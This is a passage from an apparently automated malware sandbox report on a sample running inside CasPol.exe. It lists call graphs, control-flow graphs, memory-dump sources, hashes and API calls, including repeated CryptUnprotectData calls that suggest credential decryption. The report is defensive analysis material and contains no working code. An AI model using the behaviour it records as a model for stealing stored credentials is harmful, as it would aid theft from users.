104ea75 CryptUnprotectData 35184->35191 35192 104e9c0 CryptUnprotectData 35184->35192 35193 104ec00 CryptUnprotectData 35184->35193 35194 104eca1 CryptUnprotectData 35184->35194 35195 104e9af CryptUnprotectData 35184->35195 35185->35071 35186->35184 35187->35184 35188->35184 35189->35184 35190->35184 35191->35184 35192->35184 35193->35184 35194->35184 35195->35184 35197 104b629 35196->35197 35198 104b8c2 35197->35198 35199 104ea75 CryptUnprotectData 35197->35199 35200 104e9c0 CryptUnprotectData 35197->35200 35201 104ec00 CryptUnprotectData 35197->35201 35202 104eca1 CryptUnprotectData 35197->35202 35203 104e9af CryptUnprotectData 35197->35203 35204 2080920f CryptUnprotectData 35197->35204 35198->35071 35199->35197 35200->35197 35201->35197 35202->35197 35203->35197 35204->35197 35207 104b629 35205->35207 35206 104b8c2 35206->35071 35207->35206 35208 2080920f CryptUnprotectData 35207->35208 35209 104ea75 CryptUnprotectData 35207->35209 35210 104e9c0 CryptUnprotectData 35207->35210 35211 104ec00 CryptUnprotectData 35207->35211 35212 104eca1 CryptUnprotectData 35207->35212 35213 104e9af CryptUnprotectData 35207->35213 35208->35207 35209->35207 35210->35207 35211->35207 35212->35207 35213->35207 35215 104b5f0 35214->35215 35222 104b5c0 CryptUnprotectData 35214->35222 35223 104b5d0 CryptUnprotectData 35214->35223 35224 104b66e CryptUnprotectData 35214->35224 35225 104b888 CryptUnprotectData 35214->35225 35216 104b8c2 35215->35216 35217 104ea75 CryptUnprotectData 35215->35217 35218 104e9c0 CryptUnprotectData 35215->35218 35219 104ec00 CryptUnprotectData 35215->35219 35220 104eca1 CryptUnprotectData 35215->35220 35221 104e9af CryptUnprotectData 35215->35221 35226 2080920f CryptUnprotectData 35215->35226 35216->35071 35217->35215 35218->35215 35219->35215 35220->35215 35221->35215 35222->35215 35223->35215 35224->35215 35225->35215 35226->35215 35228 104b128 35227->35228 35230 104b5c0 CryptUnprotectData 35228->35230 35231 104b5d0 CryptUnprotectData 35228->35231 35229 104b133 35229->34901 35230->35229 35231->35229 35233 104b108 35232->35233 35235 104b5c0 CryptUnprotectData 35233->35235 35236 104b5d0 CryptUnprotectData 35233->35236 35234 104b133 35234->34901 35235->35234 35236->35234 34729 1132a7d TerminateThread 34730 11214d0 34729->34730

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2630 104efc0-104efcf 2631 104efd1-104efd4 2630->2631 2632 104efe4-104efe7 2631->2632 2633 104efd6-104efe1 2631->2633 2634 104f003-104f006 2632->2634 2635 104efe9-104effc 2632->2635 2638 104f00d-104f00f 2634->2638 2639 104f008 2634->2639 2636 104effe 2635->2636 2637 104f018-104f01f 2635->2637 2636->2634 2640 104f021-104f028 2637->2640 2641 104f063 2637->2641 2638->2631 2642 104f011-104f016 2638->2642 2639->2638 2643 104f055-104f060 2640->2643 2644 104f02a 2640->2644 2646 104f068-104f08f 2641->2646 2642->2631 2645 104f02d-104f039 2644->2645 2645->2641 2647 104f03b-104f03e 2645->2647 2651 104f0b4-104f0df 2646->2651 2652 104f091-104f09b 2646->2652 2647->2646 2648 104f040-104f04e 2647->2648 2648->2641 2650 104f050-104f053 2648->2650 2650->2643 2650->2645 2657 104f104-104f12f 2651->2657 2658 104f0e1-104f0eb 2651->2658 2653 104f0b0-104f0b3 2652->2653 2654 104f09d-104f0ae 2652->2654 2654->2653 2663 104f154-104f17f 2657->2663 2664 104f131-104f13b 2657->2664 2659 104f100-104f103 2658->2659 2660 104f0ed-104f0fe 2658->2660 2660->2659 2669 104f1a4-104f1cf 2663->2669 2670 104f181-104f18b 2663->2670 2665 104f150-104f153 2664->2665 2666 104f13d-104f14e 2664->2666 2666->2665 2675 104f1f4-104f21f 2669->2675 2676 104f1d1-104f1db 2669->2676 2671 104f1a0-104f1a3 2670->2671 2672 104f18d-104f19e 2670->2672 2672->2671 2681 104f244-104f26f 2675->2681 2682 104f221-104f22b 2675->2682 2677 104f1f0-104f1f3 2676->2677 2678 104f1dd-104f1ee 2676->2678 2678->2677 2687 104f294-104f2a0 2681->2687 2688 104f271-104f27b 2681->2688 2683 104f240-104f243 2682->2683 2684 104f22d-104f23e 2682->2684 2684->2683 2693 104f2a2-104f2b8 2687->2693 2694 104f2bc-104f2bf 2687->2694 2689 104f290-104f293 2688->2689 2690 104f27d-104f28e 2688->2690 2690->2689 2693->2694 2695 104f2e4-104f2f8 2694->2695 2696 104f2c1-104f2cb 2694->2696 2701 104f314-104f31b 2695->2701 2702 104f2fa-104f30f 2695->2702 2697 104f2e0-104f2e3 2696->2697 2698 104f2cd-104f2de 2696->2698 2698->2697 2705 104f330-104f333 2701->2705 2706 104f31c-104f32e 2701->2706 2703 104f334-104f35f 2702->2703 2704 104f311 2702->2704 2709 104f384-104f3af 2703->2709 2710 104f361-104f36b 2703->2710 2704->2701 2706->2705 2714 104f3d4-104f43e LdrInitializeThunk call 104b34c 2709->2714 2715 104f3b1-104f3bb 2709->2715 2711 104f380-104f383 2710->2711 2712 104f36d-104f37e 2710->2712 2712->2711 2725 104f443-104f44f 2714->2725 2717 104f3d0-104f3d3 2715->2717 2718 104f3bd-104f3ce 2715->2718 2718->2717 2726 104f455-104f45e 2725->2726 2727 104f66b-104f67e 2725->2727 2728 104f464-104f479 2726->2728 2729 104f6a0 2726->2729 2730 104f6a5-104f6a9 2727->2730 2735 104f493-104f4ae 2728->2735 2736 104f47b-104f48e 2728->2736 2729->2730 2731 104f6b4 2730->2731 2732 104f6ab 2730->2732 2734 104f6b5 2731->2734 2732->2731 2734->2734 2743 104f4b0-104f4ba 2735->2743 2744 104f4bc 2735->2744 2737 104f63f-104f643 2736->2737 2738 104f645 2737->2738 2739 104f64e 2737->2739 2738->2739 2739->2727 2745 104f4c1-104f4c3 2743->2745 2744->2745 2746 104f4c5-104f4d8 2745->2746 2747 104f4dd-104f575 2745->2747 2746->2737 2765 104f577-104f581 2747->2765 2766 104f583 2747->2766 2767 104f588-104f58a 2765->2767 2766->2767 2768 104f58c-104f58e 2767->2768 2769 104f5e9-104f63d 2767->2769 2770 104f590-104f59a 2768->2770 2771 104f59c 2768->2771 2769->2737 2773 104f5a1-104f5a3 2770->2773 2771->2773 2773->2769 2774 104f5a5-104f5e7 2773->2774 2774->2769
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46714064417.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 32dc98b50ac9b157d3a3d8d75ed7b75052ea78577092136c4bbf741e4f8703b0
                                                                                      • Instruction ID: 68ad5a5e2d7ad3ad8436023fbc0392d5cad105ca58c5a3ec6bef87e3bd981a1a
                                                                                      • Opcode Fuzzy Hash: 32dc98b50ac9b157d3a3d8d75ed7b75052ea78577092136c4bbf741e4f8703b0
                                                                                      • Instruction Fuzzy Hash: 1412E675B093858FD7428B78C99466E7FF2AF86304F1684B6D284DF2A2DB349C06C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 2080A195
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46747852802.0000000020800000.00000040.00000800.00020000.00000000.sdmp, Offset: 20800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_20800000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: f7a6aa13a01a7b065852bc47923f3021b5f8ea19e7f5c853c55f95c0e771cf85
                                                                                      • Instruction ID: c48297f81e4784384c2b77aaaf4009b2c2bb7b3ae43a3602f0299c75176c76d9
                                                                                      • Opcode Fuzzy Hash: f7a6aa13a01a7b065852bc47923f3021b5f8ea19e7f5c853c55f95c0e771cf85
                                                                                      • Instruction Fuzzy Hash: 922124B6800289DFDB10CF99C944BDEBFF4EF88320F14882AE555A7251C379A954DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 2080A195
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46747852802.0000000020800000.00000040.00000800.00020000.00000000.sdmp, Offset: 20800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_20800000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: c2e38c6bf848f0514764287d26869d3a6d19feb023ced2776a2b6fb2592aae85
                                                                                      • Instruction ID: 10370ee032d8a81d7f4ec1685fbf2d9b2a77c3546c45399bdb7c0687712eb84b
                                                                                      • Opcode Fuzzy Hash: c2e38c6bf848f0514764287d26869d3a6d19feb023ced2776a2b6fb2592aae85
                                                                                      • Instruction Fuzzy Hash: 5F1153B680024DDFCB10CF99C844BDEBBF5EF48320F148419EA18A7211C379A954CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f11328a257fc4321a971470e627ef9917dd47dc37dee3e07f66b500f45d8ce19
                                                                                      • Instruction ID: 9563badedc712f7d2e8968b656df72de94bb333fae60d070f62e35b1f86a7dd5
                                                                                      • Opcode Fuzzy Hash: f11328a257fc4321a971470e627ef9917dd47dc37dee3e07f66b500f45d8ce19
                                                                                      • Instruction Fuzzy Hash: 8ED017B010A164CFC3006F78E99A4683FB4FF5222230204E2E149C61A1DF79092ACB12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2954 1d6be36b-1d6be391 3107 1d6be391 call 104d320 2954->3107 3108 1d6be391 call 104d7c0 2954->3108 3109 1d6be391 call 104d3ce 2954->3109 3110 1d6be391 call 104d81f 2954->3110 2958 1d6be397-1d6be41f 3113 1d6be41f call 104de28 2958->3113 3114 1d6be41f call 104dd7a 2958->3114 2964 1d6be425-1d6be4a4 3117 1d6be4a4 call 2080aef0 2964->3117 3118 1d6be4a4 call 2080aeea 2964->3118 2970 1d6be4aa-1d6be532 3099 1d6be532 call 2080bd07 2970->3099 3100 1d6be532 call 2080bb58 2970->3100 3101 1d6be532 call 2080bca8 2970->3101 2976 1d6be538-1d6be5b7 3102 1d6be5b7 call 2080bea0 2976->3102 3103 1d6be5b7 call 2080bf00 2976->3103 3104 1d6be5b7 call 2080bf5f 2976->3104 2982 1d6be5bd-1d6be645 3105 1d6be645 call 2080c380 2982->3105 3106 1d6be645 call 2080c3e0 2982->3106 2988 1d6be64b-1d6be79f 3111 1d6be79f call 104f740 2988->3111 3112 1d6be79f call 104f6e1 2988->3112 3003 1d6be7a5-1d6be7dd 3115 1d6be7dd call 104f740 3003->3115 3116 1d6be7dd call 104f6e1 3003->3116 3006 1d6be7e3-1d6bf06c KiUserExceptionDispatcher 3096 1d6bf072-1d6bf0b7 3006->3096 3099->2976 3100->2976 3101->2976 3102->2982 3103->2982 3104->2982 3105->2988 3106->2988 3107->2958 3108->2958 3109->2958 3110->2958 3111->3003 3112->3003 3113->2964 3114->2964 3115->3006 3116->3006 3117->2970 3118->2970
                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: ab0b2ec968825c22cc8ed5c286cdf359aedfd254518ee7973cfcfa2e78891a6b
                                                                                      • Instruction ID: e471e364e800cd335999d39ea1f933aa736272b947d35bd1e6c9df969f8a06dc
                                                                                      • Opcode Fuzzy Hash: ab0b2ec968825c22cc8ed5c286cdf359aedfd254518ee7973cfcfa2e78891a6b
                                                                                      • Instruction Fuzzy Hash: C7029874A41328CFCB66DF64C89C689B7B2BF48719F1041E9D80AA3355DB365E82CF12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2785 1d6be34a 2932 1d6be34a call 104c545 2785->2932 2933 1d6be34a call 104c570 2785->2933 2934 1d6be34a call 104c580 2785->2934 2935 1d6be34a call 104c5e1 2785->2935 2786 1d6be350-1d6be391 2936 1d6be391 call 104d320 2786->2936 2937 1d6be391 call 104d7c0 2786->2937 2938 1d6be391 call 104d3ce 2786->2938 2939 1d6be391 call 104d81f 2786->2939 2789 1d6be397-1d6be41f 2940 1d6be41f call 104de28 2789->2940 2941 1d6be41f call 104dd7a 2789->2941 2795 1d6be425-1d6be4a4 2946 1d6be4a4 call 2080aef0 2795->2946 2947 1d6be4a4 call 2080aeea 2795->2947 2801 1d6be4aa-1d6be532 2948 1d6be532 call 2080bd07 2801->2948 2949 1d6be532 call 2080bb58 2801->2949 2950 1d6be532 call 2080bca8 2801->2950 2807 1d6be538-1d6be5b7 2951 1d6be5b7 call 2080bea0 2807->2951 2952 1d6be5b7 call 2080bf00 2807->2952 2953 1d6be5b7 call 2080bf5f 2807->2953 2813 1d6be5bd-1d6be645 2930 1d6be645 call 2080c380 2813->2930 2931 1d6be645 call 2080c3e0 2813->2931 2819 1d6be64b-1d6be79f 2942 1d6be79f call 104f740 2819->2942 2943 1d6be79f call 104f6e1 2819->2943 2834 1d6be7a5-1d6be7dd 2944 1d6be7dd call 104f740 2834->2944 2945 1d6be7dd call 104f6e1 2834->2945 2837 1d6be7e3-1d6bf06c KiUserExceptionDispatcher 2927 1d6bf072-1d6bf0b7 2837->2927 2930->2819 2931->2819 2932->2786 2933->2786 2934->2786 2935->2786 2936->2789 2937->2789 2938->2789 2939->2789 2940->2795 2941->2795 2942->2834 2943->2834 2944->2837 2945->2837 2946->2801 2947->2801 2948->2807 2949->2807 2950->2807 2951->2813 2952->2813 2953->2813
                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 7e32a969e6cabd6d68828a8b96e665965524d756cda9963fc1b7e407baa54d0a
                                                                                      • Instruction ID: c969a58e91b10510e654201cc7401337cf4c4b8e01e1a6d04eca121b285cf2e4
                                                                                      • Opcode Fuzzy Hash: 7e32a969e6cabd6d68828a8b96e665965524d756cda9963fc1b7e407baa54d0a
                                                                                      • Instruction Fuzzy Hash: E4028774A41328CFCB66DF60C89C689B7B2BF49719F1041E9D80A63355DB366E82CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3119 1d6be3b2-1d6be41f 3271 1d6be41f call 104de28 3119->3271 3272 1d6be41f call 104dd7a 3119->3272 3126 1d6be425-1d6be4a4 3261 1d6be4a4 call 2080aef0 3126->3261 3262 1d6be4a4 call 2080aeea 3126->3262 3132 1d6be4aa-1d6be532 3263 1d6be532 call 2080bd07 3132->3263 3264 1d6be532 call 2080bb58 3132->3264 3265 1d6be532 call 2080bca8 3132->3265 3138 1d6be538-1d6be5b7 3266 1d6be5b7 call 2080bea0 3138->3266 3267 1d6be5b7 call 2080bf00 3138->3267 3268 1d6be5b7 call 2080bf5f 3138->3268 3144 1d6be5bd-1d6be645 3269 1d6be645 call 2080c380 3144->3269 3270 1d6be645 call 2080c3e0 3144->3270 3150 1d6be64b-1d6be79f 3273 1d6be79f call 104f740 3150->3273 3274 1d6be79f call 104f6e1 3150->3274 3165 1d6be7a5-1d6be7dd 3275 1d6be7dd call 104f740 3165->3275 3276 1d6be7dd call 104f6e1 3165->3276 3168 1d6be7e3-1d6bf06c KiUserExceptionDispatcher 3258 1d6bf072-1d6bf0b7 3168->3258 3261->3132 3262->3132 3263->3138 3264->3138 3265->3138 3266->3144 3267->3144 3268->3144 3269->3150 3270->3150 3271->3126 3272->3126 3273->3165 3274->3165 3275->3168 3276->3168
                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: b20f839393721a2e876b1d7b1364a0f975f396b331fa05c43fa99ad534ebf8a6
                                                                                      • Instruction ID: 1bffacc6aff886e65cea5d85ca9e56884c5b4255c91f73a03e60d889df3d8410
                                                                                      • Opcode Fuzzy Hash: b20f839393721a2e876b1d7b1364a0f975f396b331fa05c43fa99ad534ebf8a6
                                                                                      • Instruction Fuzzy Hash: BC029874A45328CFCB66DF60C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3277 1d6be3f9-1d6be41f 3416 1d6be41f call 104de28 3277->3416 3417 1d6be41f call 104dd7a 3277->3417 3281 1d6be425-1d6be4a4 3422 1d6be4a4 call 2080aef0 3281->3422 3423 1d6be4a4 call 2080aeea 3281->3423 3287 1d6be4aa-1d6be532 3424 1d6be532 call 2080bd07 3287->3424 3425 1d6be532 call 2080bb58 3287->3425 3426 1d6be532 call 2080bca8 3287->3426 3293 1d6be538-1d6be5b7 3427 1d6be5b7 call 2080bea0 3293->3427 3428 1d6be5b7 call 2080bf00 3293->3428 3429 1d6be5b7 call 2080bf5f 3293->3429 3299 1d6be5bd-1d6be645 3430 1d6be645 call 2080c380 3299->3430 3431 1d6be645 call 2080c3e0 3299->3431 3305 1d6be64b-1d6be79f 3418 1d6be79f call 104f740 3305->3418 3419 1d6be79f call 104f6e1 3305->3419 3320 1d6be7a5-1d6be7dd 3420 1d6be7dd call 104f740 3320->3420 3421 1d6be7dd call 104f6e1 3320->3421 3323 1d6be7e3-1d6bf06c KiUserExceptionDispatcher 3413 1d6bf072-1d6bf0b7 3323->3413 3416->3281 3417->3281 3418->3320 3419->3320 3420->3323 3421->3323 3422->3287 3423->3287 3424->3293 3425->3293 3426->3293 3427->3299 3428->3299 3429->3299 3430->3305 3431->3305
                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: c112b994e38a4a99d8eba794b26bb0a15edc005d308566184af299cce565d796
                                                                                      • Instruction ID: 5bc1cfc11a0bc7c912152d5af13f3b013f378a6f1071d1d26d2b29fc566eaad0
                                                                                      • Opcode Fuzzy Hash: c112b994e38a4a99d8eba794b26bb0a15edc005d308566184af299cce565d796
                                                                                      • Instruction Fuzzy Hash: D5029974A41328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: ea288880fa4eee85dc178ebae3695372ba237f3bb0a2a46c6ae39ea0a404a517
                                                                                      • Instruction ID: 349964ac80a514090fc7410fccaffcdb46d3a2b1af245bfdc3ebc2938b6370c7
                                                                                      • Opcode Fuzzy Hash: ea288880fa4eee85dc178ebae3695372ba237f3bb0a2a46c6ae39ea0a404a517
                                                                                      • Instruction Fuzzy Hash: ED029974A41328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 57f911fa4c4aaae785742dbecc386c8673e8250498450e0add47b1ceddda5471
                                                                                      • Instruction ID: 32cbef7ded23c62afcaf424f5bf2d17b39bd5823852155d47e42ed3166904c97
                                                                                      • Opcode Fuzzy Hash: 57f911fa4c4aaae785742dbecc386c8673e8250498450e0add47b1ceddda5471
                                                                                      • Instruction Fuzzy Hash: 8AF19974A45328CFCB66DF64C89C689B7B2BF48719F1041E9D80AA3355DB365E82CF12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 28098046d8141abac1a865520842bf04765969bc9b2c3befaaeb5c58cb780124
                                                                                      • Instruction ID: 28c34ca72198e0c05e6d4221bead41122215bccb161a034ab19a39bad816dfe9
                                                                                      • Opcode Fuzzy Hash: 28098046d8141abac1a865520842bf04765969bc9b2c3befaaeb5c58cb780124
                                                                                      • Instruction Fuzzy Hash: 8DF1AA74A45328CFCB66DF64C89C689B7B2BF48719F1041E9D80AA3355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 6eb0202956bd0a0a38a466df383966e7054397491b6b5cd5a236ea22f8818a1a
                                                                                      • Instruction ID: 481745c75ff2991e78aa5185ae3c73c90eaca86bb566187bd5680f4c251529a0
                                                                                      • Opcode Fuzzy Hash: 6eb0202956bd0a0a38a466df383966e7054397491b6b5cd5a236ea22f8818a1a
                                                                                      • Instruction Fuzzy Hash: 38F1A974A45328CFCB66DF64C89C689B7B2BF48719F1041E9D80AA3355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 80ad8cc59bb5bb99f3d3c1183e8fdccf957a7108c4e00a1d2339cb205532c96e
                                                                                      • Instruction ID: 178cc7bba5ec9cbaf8f05cbf724ba1c04a26e87f863019293caa3fc404f11445
                                                                                      • Opcode Fuzzy Hash: 80ad8cc59bb5bb99f3d3c1183e8fdccf957a7108c4e00a1d2339cb205532c96e
                                                                                      • Instruction Fuzzy Hash: 04F1A974A41328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 76c0fde91f49a20343897cf715950e85f76ac78175d340d8d6e3afbc9baae920
                                                                                      • Instruction ID: 6f393d32c9ff91a7bfc5adae94aec240f48464664fa4cb391e0b29a6dae53fdb
                                                                                      • Opcode Fuzzy Hash: 76c0fde91f49a20343897cf715950e85f76ac78175d340d8d6e3afbc9baae920
                                                                                      • Instruction Fuzzy Hash: 57E1A974A45328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355CB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 95f69c10e9747d5496d0a4a543ee9d300ce1fbd3a147d66871eea20f1668911a
                                                                                      • Instruction ID: 40da75b40b5982df1746f783dc90e84ab64499833ec7291e041d0f32e82b16e7
                                                                                      • Opcode Fuzzy Hash: 95f69c10e9747d5496d0a4a543ee9d300ce1fbd3a147d66871eea20f1668911a
                                                                                      • Instruction Fuzzy Hash: D6E1A934A45328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355CB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 57cd422702821b2c8a2055f047e3a87d2c32c41261311dd6b013ef651f25d7cd
                                                                                      • Instruction ID: 74c370965f287f08ba4f16a39a05e266d97733173cf8b3cd1a4e0b05753d456a
                                                                                      • Opcode Fuzzy Hash: 57cd422702821b2c8a2055f047e3a87d2c32c41261311dd6b013ef651f25d7cd
                                                                                      • Instruction Fuzzy Hash: A4E19974A45328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355CB365E82CF06
